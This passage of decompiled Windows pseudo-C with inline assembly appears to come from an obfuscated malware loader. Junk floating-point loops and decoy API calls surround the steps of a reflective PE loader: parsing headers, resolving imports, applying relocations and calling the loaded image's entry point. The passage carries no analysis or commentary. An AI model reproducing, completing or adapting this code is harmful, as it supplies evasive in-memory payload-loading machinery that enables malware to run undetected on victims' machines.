							_t879 = _t879 + 1;
							__eflags = _t879;
							asm("movd xmm0, esi");
							asm("cvtdq2pd xmm0, xmm0");
							asm("comisd xmm1, xmm0");
						} while (_t879 >= 0);
						asm("movsd xmm0, [0x6f1c97c0]");
						asm("movsd [ebp-0x90], xmm0");
						asm("movsd xmm0, [0x6f1c9648]");
						asm("movsd [ebp-0xb4], xmm0");
						asm("movss xmm0, [ebp-0x1c]");
						while(1) {
							_t691 = _v44;
							asm("movss xmm1, [0x6f1c977c]");
							asm("cdq");
							_t815 = _v60;
							_t453 = _t691 - _t814 >> 1;
							_v52 = _t453;
							__eflags = _t453 - _t815;
							if(__eflags >= 0) {
								break;
							}
							asm("comiss xmm1, xmm0");
							if(__eflags < 0) {
								_t559 = E6F1B8E30(AreFileApisANSI(), 0x64);
								asm("cvtsd2ss xmm0, xmm0");
								asm("divss xmm0, [ebp-0x78]");
								_t560 = E6F1B8AFE(_t559);
								_t562 = E6F1B8E30(E6F185D90(), _t561);
								asm("movsd [ebp-0xe4], xmm0");
								_t563 = E6F1B8E30(_t562, _t560);
								asm("movss xmm1, [ebp-0x78]");
								asm("cvtsd2ss xmm0, xmm0");
								asm("divss xmm1, xmm0");
								asm("movaps xmm0, xmm1");
								_t565 = E6F1B8E30(E6F1B8AFE(_t563), _t564);
								asm("movsd xmm2, [ebp-0xe4]");
								asm("movaps xmm1, xmm0");
								asm("movaps xmm0, xmm2");
								_t814 = 0;
								asm("divsd xmm0, xmm1");
								asm("mulsd xmm2, xmm1");
								asm("cvtpd2ps xmm0, xmm0");
								asm("cvtps2pd xmm0, xmm0");
								asm("mulsd xmm0, xmm2");
								asm("movsd [ebp-0xe4], xmm0");
								E6F1B8E30(_t565, _t560);
								asm("movsd xmm1, [ebp-0xe4]");
								asm("addsd xmm1, xmm0");
								asm("cvtpd2ps xmm0, xmm1");
							} else {
								_t568 = E6F1B8E30(TlsAlloc(), 0x48);
								asm("divsd xmm0, [ebp-0x90]");
								_t569 = E6F1B8CDF(_t568);
								asm("sbb eax, edx");
								_t814 = 0;
								E6F1B8E30(0, 0xc8 - _t569);
								asm("movsd [ebp-0xe4], xmm0");
								E6F1B8E30(E6F185D90(), _t572);
								asm("movsd xmm1, [ebp-0xe4]");
								asm("subsd xmm1, xmm0");
								asm("subsd xmm1, [ebp-0xb4]");
								asm("cvtpd2ps xmm0, xmm1");
							}
						}
						_t844 = _v188;
						asm("movss [ebp-0x1c], xmm0");
						_t455 =  *((intOrPtr*)(_t844 + 0x3c)) + _t844;
						_v96 = _t455;
						_t880 =  *(_t455 + 0x54);
						_t456 = _v48;
						_v36 = _t456;
						__eflags = _t880;
						if(_t880 == 0) {
							L132:
							asm("movsd xmm0, [0x6f1c96c0]");
							_t881 = 1;
							asm("movsd [ebp-0x10c], xmm0");
							do {
								__imp__GetTickCount64();
								asm("movsd xmm1, [ebp-0x10c]");
								_t881 = _t881 + 1;
								__eflags = _t881;
								asm("movd xmm0, esi");
								asm("cvtdq2pd xmm0, xmm0");
								asm("comisd xmm1, xmm0");
							} while (_t881 >= 0);
							_t882 = __imp__GetThreadErrorMode;
							asm("movss xmm1, [0x6f1c9758]");
							asm("movss xmm0, [ebp-0x1c]");
							_t845 = _v52;
							while(1) {
								L135:
								asm("movss xmm2, [0x6f1c9740]");
								while(1) {
									__eflags = _t845 - _v60;
									if(_t845 >= _v60) {
										break;
									}
									asm("ucomiss xmm0, xmm1");
									asm("movss [ebp-0x7c], xmm2");
									asm("lahf");
									__eflags = _t456 & 0x00000044;
									if((_t456 & 0x00000044) != 0) {
										continue;
									} else {
										goto L138;
									}
									do {
										L138:
										 *_t882();
										asm("movss xmm0, [ebp-0x7c]");
										_t557 = E6F185C20(_t691, _t815);
										asm("movss xmm2, [ebp-0x7c]");
										asm("movaps xmm1, xmm0");
										asm("divss xmm2, xmm2");
										asm("mulss xmm1, xmm0");
										asm("movss [ebp-0x7c], xmm2");
										asm("cvttss2si eax, xmm1");
										_t456 = _t557;
										asm("movd xmm1, eax");
										asm("cvtdq2ps xmm1, xmm1");
										asm("mulss xmm1, xmm2");
										asm("subss xmm0, xmm1");
										asm("movss xmm1, [0x6f1c9758]");
										asm("ucomiss xmm0, xmm1");
										asm("movss [ebp-0x1c], xmm0");
										asm("lahf");
										__eflags = _t456 & 0x00000044;
									} while ((_t456 & 0x00000044) != 0);
									goto L135;
								}
								__imp__GetTickCount64();
								__imp__GetTickCount64();
								_v80 = _t456;
								_v52 = _t815;
								E6F1B8DF0(E6F1B81A0(_t456, _t815, 0x2710, 0), _t457, _t815);
								asm("mulsd xmm0, [ebp-0x170]");
								asm("movsd [ebp-0x88], xmm0");
								E6F1B8DF0(E6F1B81A0(_v80, _v52, 0x2710, 0), _t459, _t815);
								asm("mulsd xmm0, [ebp-0xdc]");
								_t461 = _v96;
								asm("movsd xmm1, [ebp-0x88]");
								asm("addsd xmm1, xmm0");
								_t848 = ( *(_t461 + 0x14) & 0x0000ffff) + _t461;
								_t462 =  *(_t461 + 6) & 0x0000ffff;
								asm("mulsd xmm1, [ebp-0xac]");
								asm("divsd xmm1, [0x6f1c9590]");
								asm("movsd [ebp-0x88], xmm1");
								__eflags = _t462;
								if(_t462 == 0) {
									L154:
									asm("movsd xmm0, [0x6f1c9570]");
									_t884 = 1;
									asm("movsd [ebp-0x50], xmm0");
									asm("movsd [ebp-0x34], xmm0");
									asm("movsd xmm0, [0x6f1c9568]");
									asm("movsd [ebp-0xdc], xmm0");
									asm("movsd xmm0, [0x6f1c9550]");
									asm("movsd [ebp-0x90], xmm0");
									do {
										__imp__GetTickCount64();
										asm("movsd xmm0, [ebp-0x34]");
										asm("subsd xmm0, [ebp-0xdc]");
										asm("mulsd xmm0, [ebp-0xac]");
										asm("addsd xmm0, [ebp-0x170]");
										asm("movsd [ebp-0x34], xmm0");
										_t462 = E6F1B8DF0(E6F1B81A0(_t462, _t815, 0x2710, 0), _t463, _t815);
										asm("movsd xmm1, [ebp-0x34]");
										_t884 = _t884 + 1;
										__eflags = _t884;
										asm("mulsd xmm1, xmm0");
										asm("movd xmm0, esi");
										asm("cvtdq2pd xmm0, xmm0");
										asm("mulsd xmm1, [ebp-0x90]");
										asm("movsd [ebp-0x34], xmm0");
										asm("addsd xmm1, [ebp-0x88]");
										asm("movsd [ebp-0x88], xmm1");
										asm("movsd xmm1, [ebp-0x178]");
										asm("comisd xmm1, xmm0");
									} while (_t884 >= 0);
									_t695 = _v44;
									_t464 = _t695 + 4;
									__eflags = _t464 - _v156;
									_t886 =  >  ? _t695 : _v112;
									_t697 = _v96 - 0xffffff80;
									_v44 = _t886;
									_v72 = _t697;
									_t850 =  *_t697 + _v48;
									_v8 = 0xffffffff;
									asm("movsd xmm0, [0x6f1c9688]");
									asm("movsd xmm1, [0x6f1c9608]");
									asm("movsd [ebp-0x168], xmm0");
									asm("movsd [ebp-0xdc], xmm1");
									while(1) {
										L157:
										asm("movss xmm1, [ebp-0x1c]");
										_v40 = _t850;
										while(1) {
											asm("movss xmm0, [0x6f1c96d0]");
											asm("movss xmm3, [0x6f1c96bc]");
											asm("movss xmm2, [0x6f1c9790]");
											while(1) {
												L159:
												__eflags =  *(_t850 + 0xc);
												if( *(_t850 + 0xc) == 0) {
													break;
												}
												__eflags =  *_t697;
												if( *_t697 == 0) {
													break;
												}
												_t858 = _v60;
												while(1) {
													__eflags = _t886 - _t858;
													if(__eflags != 0) {
														break;
													}
													asm("comiss xmm0, xmm1");
													_t739 = 0x69;
													_t819 = 0x4f;
													if(__eflags <= 0) {
														L167:
														asm("ucomiss xmm1, xmm2");
														asm("movss [ebp-0x20], xmm3");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if(__eflags != 0) {
															L171:
															asm("comiss xmm1, xmm0");
															if(__eflags >= 0) {
																_t501 = E6F1B8E30(E6F185EE0(0x16, _t819), _t500);
																asm("movaps xmm1, xmm0");
																asm("movsd [ebp-0x90], xmm0");
																asm("addsd xmm1, [ebp-0xdc]");
																asm("movss xmm0, [ebp-0xa4]");
																asm("cvtsd2ss xmm1, xmm1");
																asm("cvtss2sd xmm1, xmm1");
																asm("movsd [ebp-0xe4], xmm1");
																_t464 = E6F1B8E30(E6F1B8AFE(_t501), _t502);
																asm("mulsd xmm0, [ebp-0x90]");
																asm("movsd xmm1, [ebp-0xe4]");
																asm("movss xmm2, [0x6f1c9790]");
																asm("movss xmm3, [0x6f1c96bc]");
																asm("addsd xmm1, xmm0");
																asm("movss xmm0, [0x6f1c96d0]");
																asm("cvtpd2ps xmm1, xmm1");
															}
															continue;
														}
														do {
															_t503 = DestroyCaret();
															asm("movss xmm0, [ebp-0x20]");
															_t464 = E6F1B8AFE(_t503);
															_push(_t819);
															_push(_t464);
															E6F185A30();
															asm("movss xmm2, [0x6f1c9790]");
															_t914 = _t914 + 8;
															asm("cvtsd2ss xmm0, xmm0");
															asm("ucomiss xmm0, xmm2");
															asm("movss [ebp-0x20], xmm0");
															asm("movaps xmm1, xmm0");
															asm("lahf");
															__eflags = _t464 & 0x00000044;
														} while (__eflags != 0);
														asm("movss xmm0, [0x6f1c96d0]");
														asm("movss xmm3, [0x6f1c96bc]");
														goto L171;
													}
													_t900 = 0x4f;
													do {
														_t739 = _t739 * _t900;
														_t819 = _t819 + _t819;
														_t900 = _t819;
														_t464 = _t739 - _t900;
														__eflags = _t464;
														asm("movd xmm1, eax");
														asm("cvtdq2ps xmm1, xmm1");
														asm("comiss xmm0, xmm1");
													} while (_t464 > 0);
													_t886 = _v44;
													goto L167;
												}
												_t859 = _v40;
												asm("movss [ebp-0x1c], xmm1");
												_t815 = _v236( *((intOrPtr*)(_t859 + 0xc)) + _v48);
												_t498 =  *_t859 + _v48;
												_t860 = _v48;
												_t718 =  *((intOrPtr*)(_t859 + 0x10)) + _t860;
												__eflags = _t718;
												_v92 = _t815;
												_v68 = _t718;
												while(1) {
													_t719 =  *_t718;
													_v76 = _t498;
													__eflags = _t719;
													if(_t719 == 0) {
														break;
													}
													__eflags = _t498;
													if(_t498 == 0) {
														L179:
														__eflags = _t886 + _t886 - _v60;
														if(__eflags < 0) {
															asm("movss xmm1, [0x6f1c9668]");
															asm("comiss xmm1, [ebp-0x1c]");
															if(__eflags <= 0) {
																GetForegroundWindow();
																asm("movss xmm0, [0x6f1c972c]");
																_t520 = E6F185C20(_t719, _t815);
																asm("cvttss2si eax, xmm0");
																_t521 = _t520;
															} else {
																GetDialogBaseUnits();
																_t521 = 0x78;
															}
															asm("movd xmm0, eax");
															_t864 = 0x2a;
															asm("cvtdq2ps xmm0, xmm0");
															_v144 = 0;
															asm("comiss xmm0, [0x6f1c96d4]");
															asm("movss [ebp-0x1c], xmm0");
															if(__eflags < 0) {
																L187:
																asm("movss xmm1, [0x6f1c96a8]");
																asm("comiss xmm1, xmm0");
																if(__eflags > 0) {
																	_push(0);
																	_push(0x13);
																	E6F185A30();
																	asm("cvttsd2si eax, xmm0");
																	_t914 = _t914 + 8;
																	asm("movd xmm0, eax");
																	asm("cvtdq2ps xmm0, xmm0");
																	asm("movss [ebp-0x1c], xmm0");
																}
																asm("ucomiss xmm0, [0x6f1c970c]");
																asm("movss xmm1, [ebp-0xc8]");
																asm("movss [ebp-0x20], xmm1");
																asm("lahf");
																__eflags = _t521 & 0x00000044;
																if((_t521 & 0x00000044) != 0) {
																	L192:
																	_t822 = _v68;
																	L193:
																	_t860 = _v48;
																	L194:
																	__eflags = _t886 + 4 - _v156;
																	_v8 = 0xffffffff;
																	_t728 =  >  ? _t886 : _v112;
																	_t823 = _t822 + 4;
																	_t886 =  >  ? _t886 : _v112;
																	_v68 = _t823;
																	_t729 = _v76;
																	__eflags = _t729;
																	_t498 =  ==  ? _t729 : _t729 + 4;
																	_t718 = _t823;
																	_t815 = _v92;
																	continue;
																} else {
																	asm("movsd xmm0, [ebp-0x168]");
																	asm("movsd [ebp-0xb4], xmm0");
																	do {
																		__imp__GetSystemDefaultUILanguage();
																		asm("movss xmm0, [ebp-0x20]");
																		asm("addss xmm0, xmm0");
																		asm("movss [ebp-0x20], xmm0");
																		asm("cvtps2pd xmm0, xmm0");
																		asm("mulsd xmm0, [ebp-0xb4]");
																		asm("movsd [ebp-0xb4], xmm0");
																		asm("cvtpd2ps xmm0, xmm0");
																		asm("ucomiss xmm0, [0x6f1c970c]");
																		asm("movss [ebp-0x1c], xmm0");
																		asm("lahf");
																		__eflags = _t521 & 0x00000044;
																	} while ((_t521 & 0x00000044) != 0);
																	goto L192;
																}
															} else {
																_t320 = _t864 + 0x2e; // 0x58
																_t524 = E6F1B8E30(_t521, _t320);
																asm("cvtsd2ss xmm0, xmm0");
																_t321 = _t864 - 0x29; // 0x1
																asm("movss [ebp-0x20], xmm0");
																E6F1B8E30(_t524, _t321);
																asm("cvtsd2ss xmm0, xmm0");
																asm("movss [ebp-0x30], xmm0");
																do {
																	IsSystemResumeAutomatic();
																	_t528 = E6F1B8E30(E6F185D90(), _t527);
																	asm("movss xmm1, [ebp-0x20]");
																	_t864 = 1;
																	asm("cvtsd2ss xmm0, xmm0");
																	_v144 = 0;
																	asm("subss xmm1, xmm0");
																	asm("movss [ebp-0x1c], xmm0");
																	asm("movaps xmm0, xmm1");
																	_t521 = E6F1B8E30(E6F1B8AFE(_t528), _t529);
																	asm("xorps xmm1, xmm1");
																	asm("cvtsd2ss xmm1, xmm0");
																	asm("movss xmm0, [ebp-0x1c]");
																	asm("divss xmm0, [ebp-0x30]");
																	asm("movss [ebp-0x20], xmm1");
																	asm("mulss xmm0, xmm1");
																	asm("comiss xmm0, [0x6f1c96d4]");
																	asm("movss [ebp-0x1c], xmm0");
																} while (__eflags >= 0);
																goto L187;
															}
														}
														_t531 = _t719 + _t860;
														_v72 = _t531;
														_t533 = _v200(_t815, _t531 + 2);
														_t822 = _v68;
														 *_t822 = _t533;
														goto L194;
													}
													_t865 =  *_t498;
													__eflags = _t865;
													if(_t865 >= 0) {
														_t860 = _v48;
														goto L179;
													}
													asm("cdq");
													_t826 = _v92;
													__eflags = _t886 - _t815 >> 1 - _v156;
													_t736 =  >=  ? _t886 : _v112;
													_t886 =  >=  ? _t886 : _v112;
													_t822 = _v68;
													 *_t822 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v92 + 0x3c)) + _t826 + 0x78)) + _t826 + 0x1c)) + ((_t865 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v92 + 0x3c)) + _t826 + 0x78)) + _t826 + 0x10))) * 4 + _t826)) + _t826;
													goto L193;
												}
												_t464 = _t886 + 4;
												_v44 = _t886;
												__eflags = _t464 - _v60;
												if(__eflags <= 0) {
													asm("movss xmm0, [0x6f1c9770]");
													asm("movss xmm1, [0x6f1c9690]");
													asm("movss [ebp-0x60], xmm0");
													asm("movss xmm0, [ebp-0x1c]");
													asm("comiss xmm1, xmm0");
													if(__eflags <= 0) {
														L200:
														asm("ucomiss xmm0, [0x6f1c971c]");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if(__eflags == 0) {
															asm("movss xmm0, [0x6f1c9724]");
															_t509 = E6F1B8AFE(_t464);
															_push(_t815);
															_push(_t509);
															E6F185A30();
															asm("cvtsd2ss xmm0, xmm0");
															_t914 = _t914 + 8;
															asm("addss xmm0, [ebp-0xcc]");
															_t510 = E6F1B8AFE(_t509);
															_v144 = _t815;
															_t464 = E6F185EE0(_t510, _t815);
														}
														asm("movss xmm1, [ebp-0x18]");
														do {
															asm("movaps xmm0, xmm1");
															asm("addss xmm1, xmm0");
															asm("comiss xmm1, [0x6f1c9678]");
														} while (__eflags >= 0);
														asm("ucomiss xmm1, [0x6f1c973c]");
														asm("movss [ebp-0x1c], xmm1");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if((_t464 & 0x00000044) == 0) {
															asm("movss xmm0, [0x6f1c97b8]");
															_t464 = E6F1B8E30(E6F1B8AFE(_t464), _t508);
															asm("xorps xmm1, xmm1");
															asm("cvtsd2ss xmm1, xmm0");
															asm("movaps xmm0, xmm1");
															asm("mulss xmm0, [0x6f1c97a8]");
															asm("subss xmm1, xmm0");
															asm("movss [ebp-0x1c], xmm1");
														}
														asm("ucomiss xmm1, [0x6f1c96a4]");
														asm("lahf");
														__eflags = _t464 & 0x00000044;
														if(__eflags == 0) {
															asm("movsd xmm0, [ebp-0xc0]");
															_t504 = E6F1B8CDF(_t464);
															_push(_t815);
															_push(_t504);
															E6F185A30();
															asm("cvttsd2si eax, xmm0");
															_t914 = _t914 + 8;
															asm("cdq");
															_t898 = _t815;
															_t815 = 0;
															_t351 = _t815 + 0x51; // 0x51
															_t505 = E6F1B8E30(_t504, _t351);
															asm("cvtsd2ss xmm0, xmm0");
															asm("subss xmm0, [0x6f1c9704]");
															_t464 = E6F1B8E30(E6F1B85B0(E6F1B8AFE(_t505), 0, _t504, _t898), _t507);
															asm("cvtsd2ss xmm0, xmm0");
															asm("xorps xmm1, xmm1");
															asm("cvtss2sd xmm1, xmm0");
															asm("movsd xmm0, [ebp-0x50]");
															asm("divsd xmm0, [ebp-0xd4]");
															asm("mulsd xmm1, xmm0");
															asm("cvtpd2ps xmm1, xmm1");
															asm("movss [ebp-0x1c], xmm1");
														}
														asm("movss xmm0, [0x6f1c96fc]");
														asm("movss xmm2, [0x6f1c9790]");
														asm("movss xmm3, [0x6f1c96bc]");
														_t886 = _v44;
														_t850 = _v40;
														_t697 = _v72;
														asm("movss [ebp-0x20], xmm0");
														asm("movss xmm0, [0x6f1c9678]");
														asm("comiss xmm0, xmm1");
														asm("movss xmm0, [0x6f1c96d0]");
														if(__eflags > 0) {
															do {
																_t464 = GetSystemDefaultLangID();
																asm("movss xmm1, [ebp-0x20]");
																asm("movss xmm2, [0x6f1c9678]");
																asm("movaps xmm0, xmm1");
																asm("addss xmm0, xmm1");
																asm("comiss xmm2, xmm0");
																asm("movaps xmm1, xmm0");
																asm("movss [ebp-0x20], xmm0");
																asm("movss [ebp-0x1c], xmm1");
															} while (__eflags > 0);
															_t886 = _v44;
															_t850 = _v40;
															_t697 = _v72;
															asm("movss xmm0, [0x6f1c96d0]");
															asm("movss xmm3, [0x6f1c96bc]");
															asm("movss xmm2, [0x6f1c9790]");
														}
														continue;
													}
													_t511 = E6F1B8E30(_t464, 1);
													asm("cvtsd2ss xmm0, xmm0");
													_t821 = 0;
													__eflags = 0;
													_t343 = _t821 + 2; // 0x2
													_t725 = _t343;
													asm("movss [ebp-0x20], xmm0");
													_t512 = E6F1B8E30(_t511, _t343);
													asm("movss xmm1, [ebp-0x60]");
													asm("cvtsd2ss xmm0, xmm0");
													asm("movss [ebp-0x54], xmm0");
													do {
														asm("movss xmm0, [ebp-0x20]");
														asm("subss xmm0, xmm1");
														_t513 = E6F1B8AFE(_t512);
														asm("movss xmm0, [ebp-0x60]");
														E6F185C20(_t725, _t821);
														asm("movss [ebp-0x60], xmm0");
														asm("movss xmm0, [ebp-0x54]");
														_t517 = E6F1B8E30(E6F1B8AFE(E6F185C20(_t725, _t821)), _t516);
														asm("cvtsd2ss xmm0, xmm0");
														_t725 = _t513;
														asm("movss [ebp-0x54], xmm0");
														_t512 = E6F1B8E30(_t517, _t513);
														asm("movss xmm1, [ebp-0x60]");
														asm("movss xmm2, [0x6f1c9690]");
														asm("cvtsd2ss xmm0, xmm0");
														asm("mulss xmm0, xmm1");
														asm("mulss xmm0, [ebp-0x54]");
														asm("addss xmm0, [ebp-0x20]");
														asm("comiss xmm2, xmm0");
													} while (__eflags > 0);
													goto L200;
												}
												_t697 = _v72;
												_t850 = _v40 + 0x14;
												goto L157;
											}
											asm("movsd xmm0, [ebp-0x50]");
											_t851 = 1;
											_t887 = __imp__GetTickCount64;
											asm("movsd [ebp-0xd4], xmm0");
											asm("movsd xmm0, [0x6f1c9548]");
											asm("movsd [ebp-0xb4], xmm0");
											do {
												_t465 =  *_t887();
												asm("movsd xmm0, [ebp-0xd4]");
												asm("mulsd xmm0, [ebp-0xac]");
												asm("addsd xmm0, [ebp-0x170]");
												asm("movsd [ebp-0xd4], xmm0");
												E6F1B8DF0(E6F1B81A0(_t465, _t815, 0x2710, 0), _t466, _t815);
												asm("movsd xmm1, [ebp-0xd4]");
												_t851 = _t851 + 1;
												__eflags = _t851;
												asm("mulsd xmm1, xmm0");
												asm("movsd xmm0, [ebp-0x88]");
												asm("mulsd xmm1, [ebp-0xb4]");
												asm("addsd xmm0, xmm1");
												asm("movsd xmm1, [ebp-0x10c]");
												asm("movsd [ebp-0x88], xmm0");
												asm("movd xmm0, edi");
												asm("cvtdq2pd xmm0, xmm0");
												asm("comisd xmm1, xmm0");
												asm("movsd [ebp-0xd4], xmm0");
											} while (_t851 >= 0);
											_t468 = _v96;
											_t699 = _v48;
											_t888 = _v44;
											_t853 = _t699 -  *((intOrPtr*)(_t468 + 0x34));
											__eflags =  *(_t468 + 0xa4);
											_v52 = _t853;
											if( *(_t468 + 0xa4) == 0) {
												L245:
												_t889 = 1;
												do {
													__imp__GetTickCount64();
													asm("movsd xmm0, [ebp-0x50]");
													asm("mulsd xmm0, [ebp-0xac]");
													asm("addsd xmm0, [ebp-0x170]");
													asm("movsd [ebp-0x50], xmm0");
													_t468 = E6F1B8DF0(E6F1B81A0(_t468, _t815, 0x2710, 0), _t469, _t815);
													asm("movsd xmm1, [ebp-0x50]");
													_t889 = _t889 + 1;
													__eflags = _t889;
													asm("mulsd xmm1, xmm0");
													asm("movsd xmm0, [ebp-0x88]");
													asm("mulsd xmm1, [ebp-0xb4]");
													asm("addsd xmm0, xmm1");
													asm("movsd xmm1, [ebp-0x10c]");
													asm("movsd [ebp-0x88], xmm0");
													asm("movd xmm0, esi");
													asm("cvtdq2pd xmm0, xmm0");
													asm("comisd xmm1, xmm0");
													asm("movsd [ebp-0x50], xmm0");
												} while (_t889 >= 0);
												_t854 = _v48;
												 *0x6f1d1484 = _t854;
												_t891 =  *((intOrPtr*)(_v96 + 0x28)) + _t854;
												_v8 = 0xffffffff;
												__eflags = _v444;
												if(_v444 != 0) {
													_t471 =  *_t891(_v412, 1, 0);
													L255:
													asm("movsd xmm0, [ebp-0x88]");
													E6F1B8CC1(_t471);
													L253:
													 *[fs:0x0] = _v16;
													__eflags = _v24 ^ _t912;
													return E6F194D4A(_v24 ^ _t912);
												}
												_t471 = E6F186550(_t854, _v440);
												_v52 = _t471;
												__eflags = _t471;
												if(_t471 == 0) {
													goto L255;
												}
												__eflags = _v416;
												if(_v416 == 0) {
													_t856 = _v412;
												} else {
													_t856 = _v412;
													E6F186510(_t856, _t854);
												}
												 *_t891(_t856, 1, 0);
												_v52(_v432, _v428, _v424, _v420);
												goto L253;
											}
											asm("movss xmm1, [ebp-0x1c]");
											__eflags = _t888 - _v60;
											if(__eflags == 0) {
												asm("comiss xmm1, [ebp-0x78]");
												_t893 = 0x37;
												if(__eflags < 0) {
													L221:
													_t468 = _v40;
													asm("o16 nop [eax+eax]");
													while(1) {
														L222:
														_t707 =  *(_t468 + 4);
														__eflags = _t707;
														if(_t707 == 0) {
															goto L245;
														}
														_t370 = _t468 + 8; // 0x100000007
														_t894 = _t370;
														_t815 =  *_t468 + _v48;
														_t709 = _t707 + 0xfffffff8 >> 1;
														__eflags = _t709;
														while(1) {
															_v36 = _t894;
															_t710 = _t709 - 1;
															__eflags = _t709;
															_t479 = _v44;
															_v52 = _t709 - 1;
															if(_t709 == 0) {
																break;
															}
															__eflags = _t479 + 4 - _v156;
															_t486 =  *_t894 & 0x0000ffff;
															_t712 =  >  ? _v44 : _v112;
															_t896 = _t486 >> 0xc;
															_v44 =  >  ? _v44 : _v112;
															_t713 = _t486;
															__eflags = _t896 - 0xa;
															if(_t896 != 0xa) {
																__eflags = _t896 - 3;
																if(_t896 != 3) {
																	__eflags = _t896 - 1;
																	if(_t896 != 1) {
																		__eflags = _t896 - 2;
																		if(_t896 == 2) {
																			_t714 = _t713 & 0x00000fff;
																			_t385 = _t714 + _t815;
																			 *_t385 =  *(_t714 + _t815) + _t853;
																			__eflags =  *_t385;
																		}
																	} else {
																		 *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) =  *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) + (_t853 >> 0x10);
																	}
																} else {
																	 *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) =  *((intOrPtr*)((_t713 & 0x00000fff) + _t815)) + _t853;
																}
															} else {
																 *((intOrPtr*)((_t486 & 0x00000fff) + _t815)) =  *((intOrPtr*)((_t486 & 0x00000fff) + _t815)) + _t853;
															}
															_t709 = _v52;
															_t894 = _v36 + 2;
															_v8 = 0xffffffff;
														}
														_t480 = _t479 + _t479;
														__eflags = _t480 - _v60;
														if(__eflags < 0) {
															asm("movsd xmm3, [0x6f1c9670]");
															asm("movsd [ebp-0xdc], xmm3");
															asm("movsd xmm3, [0x6f1c9680]");
															asm("movsd [ebp-0x90], xmm3");
															while(1) {
																asm("movss xmm2, [0x6f1c9780]");
																asm("comiss xmm1, xmm2");
																asm("movss xmm4, [0x6f1c9744]");
																asm("movss xmm0, [0x6f1c96e0]");
																if(__eflags > 0) {
																	__imp__GetErrorMode();
																	_t815 = _t815 | 0xffffffff;
																	_t710 = _t815 - 0x27;
																	_t480 = E6F1B8E30(_t480, _t815 - 0x27);
																	asm("movss xmm4, [0x6f1c9744]");
																	asm("xorps xmm1, xmm1");
																	asm("cvtsd2ss xmm1, xmm0");
																	asm("movss xmm0, [0x6f1c96e0]");
																}
																asm("movss xmm2, [0x6f1c96a0]");
																asm("ucomiss xmm1, xmm0");
																asm("lahf");
																__eflags = _t480 & 0x00000044;
																if(__eflags != 0) {
																	goto L242;
																}
																asm("movss [ebp-0x20], xmm4");
																do {
																	asm("cvttss2si ecx, xmm2");
																	_t710 = E6F185EE0(_t710, _t815);
																	_t483 = E6F1B8E30(_t482, _t482);
																	asm("xorps xmm2, xmm2");
																	asm("cvtsd2ss xmm2, xmm0");
																	asm("movss xmm0, [ebp-0x20]");
																	asm("subss xmm0, xmm2");
																	asm("movaps xmm1, xmm2");
																	asm("cvttss2si ecx, xmm0");
																	asm("movaps xmm0, xmm2");
																	asm("subss xmm0, xmm2");
																	asm("cvttss2si eax, xmm0");
																	asm("movd xmm0, ecx");
																	asm("cvtdq2ps xmm0, xmm0");
																	_t480 = _t483;
																	asm("movd xmm3, eax");
																	asm("divss xmm1, xmm0");
																	asm("cvtdq2ps xmm3, xmm3");
																	asm("addss xmm1, xmm3");
																	asm("movss [ebp-0x20], xmm3");
																	asm("ucomiss xmm1, [0x6f1c96e0]");
																	asm("lahf");
																	__eflags = _t480 & 0x00000044;
																} while (__eflags != 0);
																L242:
																asm("movss xmm0, [0x6f1c96d4]");
																asm("comiss xmm0, xmm1");
																if(__eflags <= 0) {
																	__imp__CoFreeUnusedLibraries();
																	asm("movss xmm1, [0x6f1c97c8]");
																} else {
																	_t710 = 0x16;
																	_t481 = E6F185EE0(0x16, _t815);
																	asm("movsd xmm1, [ebp-0xdc]");
																	_t480 = _t481;
																	asm("movd xmm0, eax");
																	asm("cvtdq2pd xmm0, xmm0");
																	asm("divsd xmm1, xmm0");
																	asm("movsd xmm0, [ebp-0x90]");
																	asm("subsd xmm0, xmm1");
																	asm("cvtpd2ps xmm1, xmm0");
																}
															}
														}
														_t468 = _v40 +  *((intOrPtr*)(_v40 + 4));
														_v40 = _t468;
													}
													goto L245;
												}
												_t857 = 0;
												__eflags = 0;
												do {
													TlsAlloc();
													_push(_t857);
													_push(_t893);
													E6F185A30();
													asm("cvttsd2si ecx, xmm0");
													_t914 = _t914 + 8;
													asm("movsd [ebp-0xdc], xmm0");
													_t893 = E6F185EE0(_t699, _t815);
													_t857 = _t815;
													_t699 = _t893;
													E6F1B8E30(_t491, _t893);
													asm("movsd xmm1, [ebp-0xdc]");
													asm("divsd xmm1, xmm0");
													asm("cvtpd2ps xmm1, xmm1");
													asm("comiss xmm1, [ebp-0x78]");
												} while (__eflags >= 0);
												_t853 = _v52;
												goto L221;
											}
											_t468 =  *((intOrPtr*)(_t468 + 0xa0)) + _t699;
											_v40 = _t468;
											goto L222;
										}
									}
								}
								asm("movss xmm1, [0x6f1c96d8]");
								_t866 = _t848 + 0x2c;
								__eflags = _t866;
								_t827 = 0x2d;
								do {
									_t543 = _t462 - 1;
									_v92 = _t543;
									__eflags = _v44 - _v60;
									if(_v44 < _v60) {
										asm("movss xmm0, [ebp-0x1c]");
										asm("ucomiss xmm0, xmm1");
										asm("lahf");
										__eflags = _t543 & 0x00000044;
										if((_t543 & 0x00000044) != 0) {
											_push(0);
											_push(0x58);
											E6F185A30();
											_t544 = E6F1B8CDF(_t543);
											_push(_t827);
											_push(_t544);
											E6F185A30();
											_t914 = _t914 + 0x10;
										} else {
											_t259 = 0x58 * _t827;
											_t827 = 0x58 * _t827 >> 0x20;
											E6F1B8E30(_t259, _t259);
											asm("cvtsd2ss xmm0, xmm0");
											E6F185C20(_t259, _t827);
										}
										asm("movss xmm0, [0x6f1c96b0]");
										asm("movss xmm2, [0x6f1c9778]");
										asm("movss [ebp-0x20], xmm0");
										asm("movss [ebp-0x48], xmm2");
										do {
											__imp__CoUninitialize();
											asm("cvttss2si ecx, [ebp-0x20]");
											_t545 = E6F185D90();
											asm("cdq");
											_push(_t827);
											_push(_t545);
											E6F185A30();
											asm("cvttsd2si eax, xmm0");
											_t914 = _t914 + 8;
											_v52 = _t545;
											E6F1B8E30(E6F185EE0(_t545, _t827), _t546);
											asm("xorps xmm3, xmm3");
											asm("cvtsd2ss xmm3, xmm0");
											asm("movss xmm0, [ebp-0x48]");
											asm("subss xmm0, xmm3");
											asm("movss [ebp-0x20], xmm3");
											asm("cvttss2si eax, xmm0");
